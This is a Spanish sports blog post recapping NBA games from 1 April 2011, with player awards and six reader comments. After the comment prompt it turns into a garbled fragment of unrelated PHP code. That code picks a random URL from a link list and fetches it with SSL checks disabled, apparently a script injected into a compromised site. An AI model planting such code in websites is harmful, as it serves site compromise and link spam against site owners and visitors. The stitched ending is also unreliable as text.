La Crónica (01/04/2011)

02 de April de 2011 por TheDeerHunter

Si es cierto eso de que ya casi vemos el modo playoffs puesto, hay dos gigantes que deberían estar extremadamente preocupados.

Por un lado los Spurs, que recibieron la 6ª derrota consecutiva en Houston tras otro cúmulo de errores propios que van a provocar que un día le dé un ataque al pobre Popovich. Entre ellos, otra pérdida con el partido ganado para ceder la prórroga en el período reglamentario y después, no haber hecho falta con el partido perdido al final de la misma, con el técnico berreando impotente sin que nadie del equipo le hiciera caso. Aprovechando el regalo, los Lakers se ponen a uno tras remontar 17 puntos en Salt Lake City.

Por el otro lado, los Celtics. Zaza Pachulia y Al Horford abusaron de unos verdes sin pívots y sin gasolina durante la segunda parte. No les hizo falta estar muy finos mirando al aro a los Hawks con 14 rebotes de diferencia con sus rivales. Los Heat les han superado en la clasificación con su fácil victoria en Minneapolis, con su Big Three otra vez rozando los 30 puntos por cabeza. Los Bulls respiran tranquilos con la primera plaza del Este virtualmente asegurada y ayer doblegaron a los Pistons, a pesar de los 30 puntos de Hamilton, que ahora parece insustituible por allí.

Orlando no tuvo piedad de Charlotte, quitándoles prácticamente las esperanzas de colarse en postemporada (gracias a los cielos) e Indiana logró un vital triunfo contra Milwaukee por tan sólo un punto. Philadelphia ganó a New Jersey y los Wizards, ahora que no se juegan nada, cuajaron uno de sus más completos partidos del curso ante Cleveland sin Wall, con un triple doble de Jordan Crawford, una actuación sobrehumana de Blatche y con McGee ayudándole a arrasar por dentro.

Tremendos los Grizzlies ante New Orleans. Pie y medio en postemporada e igualan a sus rivales de anoche en las tablas. Casi imparable Zach Randolph y no os perdáis el triplaco que coló Marc, con algo más que suerte, eso sí. Increíbles también los Blazers ante unos Thunder que deben estar pensando ya en otras cosas. Vuelven a colocarse sextos. Por encima tienen a Denver, que anoche se enfrentó al hueso duro que es ahora Sacramento (a buenas horas) y los Suns recuperaron algo de honrilla derrotando a los Clippers.

PREMIOS

MVP: Tras unos partidos perdidos por lesión, explosión de Andray Blatche. 36 puntos, 19 rebotes (¡16 ofensivos!, récord de la franquicia y mejor marca de la temporada en la liga) y 4 asistencias que son, hasta el momento, la mejor actuación de su carrera en la NBA.

Rookie: La baja de John Wall otorgó el mando a Jordan Crawford y el ex de Xavier cumplió a la perfección. A su habitual tendencia a la anotación (21 puntos), anoche añadió asistencias (11) y rebotes (10). Todo un señor triple doble.

Sorpresa: Dante Cunningham cuajó un buen partido en sustitución de Stephen Jackson. 21 puntos (10 de 15) y 7 rebotes.

Decepción: No fue el día de Matt Bonner desde la línea de 3. Falló los 5 triples que intentó. Como desde la zona no se prodiga mucho, finalmente se quedó sin anotar.

Esfuerzo en vano: A pesar del gran partido de Tony Parker, los Spurs cayeron por sexta vez consecutiva. Los 31 puntos y 6 asistencias del francés resultaron, finalmente, insuficientes.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Denise dice:
    #1

    Bueno, el “triplaco” de Marc Gasol es un melón que se podía tirar un mes tirando hasta que le entrase otra vez.
    El agujero en la zona de los Celtics es inmenso. Demostrandose que el tronco de Perkins era vital en este equipo.
    Hay quien dice que los Spurs se están dosificando, yo creo que no pueden más fisicamente y que ya veremos si no hay sorpresa en Primera Ronda.
    Mucho se habla de la racha de los Lakers, pero la de los Heat no se queda atrás, 10-2 desde que fueron enterrados en el blog 🙂
    Si los Wizards tienen un poco de suerte, creo que el año que viene se clasificará para playoffs y a corto plazo, pueden tener un proyecto ganador, al contrario que otros equipos como los Raptors o los Nets a los cuales los veo a la deriva.
    Amueblando las cabecitas de Blatche y McGee, y trabajandole sus movimientos, conseguirían una pareja letal en la pintura, porque potencialmente son dos pedazos de cracks. Más John Wall ya tienen a un muy buen tridente. Si a esto le sumas a Nick Young, jugadores jovenes como Jordan Crawford o Trevor Booker que irán progresando con el tiempo, el top 5 que pillarán este año en el Draft, y que tienen suficiente margen salarial para fichar este verano a agentes libres, yo creo que tienen un futuro bastante prometedor.
    Todo ello sin contar con Rashard Lewis, que ojalá puedan resucitarlo porque potencialmente es un jugón pero lamentablemente es un vago picha fría.

      Citar

  2. Txusma dice:
    #2

    Me gusta más Jordan Crawford que Nick Young, lo veo más completo aunque ambos son bastante jugoncetes. Eso sí, se tiran hasta las zapatillas. Con un buen 2 y un buen 3, y con Wall liderando el equipo sin titubeos, no tienen mala pinta, no.

      Citar

  3. MagicJohnson32 dice:
    #3

    Es alucinante que Jordan Crawford no tuviese oportunidades en Atlanta. Como lo de Thornton en NOH…

      Citar

  4. Txusma dice:
    #4

    Bueno, Thorton se marcó un buen final de temporada, no? Lo descubrimos casi a la vez que Darren Collison. Curiosamente los 2 están ya fuera de NOH…

      Citar

  5. MagicJohnson32 dice:
    #5

    Claro, hizo un final de temporada brutal. Y este año, en el mismo equipo, sin un escolta decente, no ha jugado nada. No lo entiendo…

      Citar

  6. Viva_Dirk dice:
    #6

    Bueno, Thornton no encaja nada bien en el sistema de Monty Williams, posesiones largas y defensa muy intensa, ojo que Bellinelli tampoco es el mejor para eso, pero tacticamente es mucho mas disciplinado en ambos lados de la cancha, ser europeo en ese aspecto cuenta mucho.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>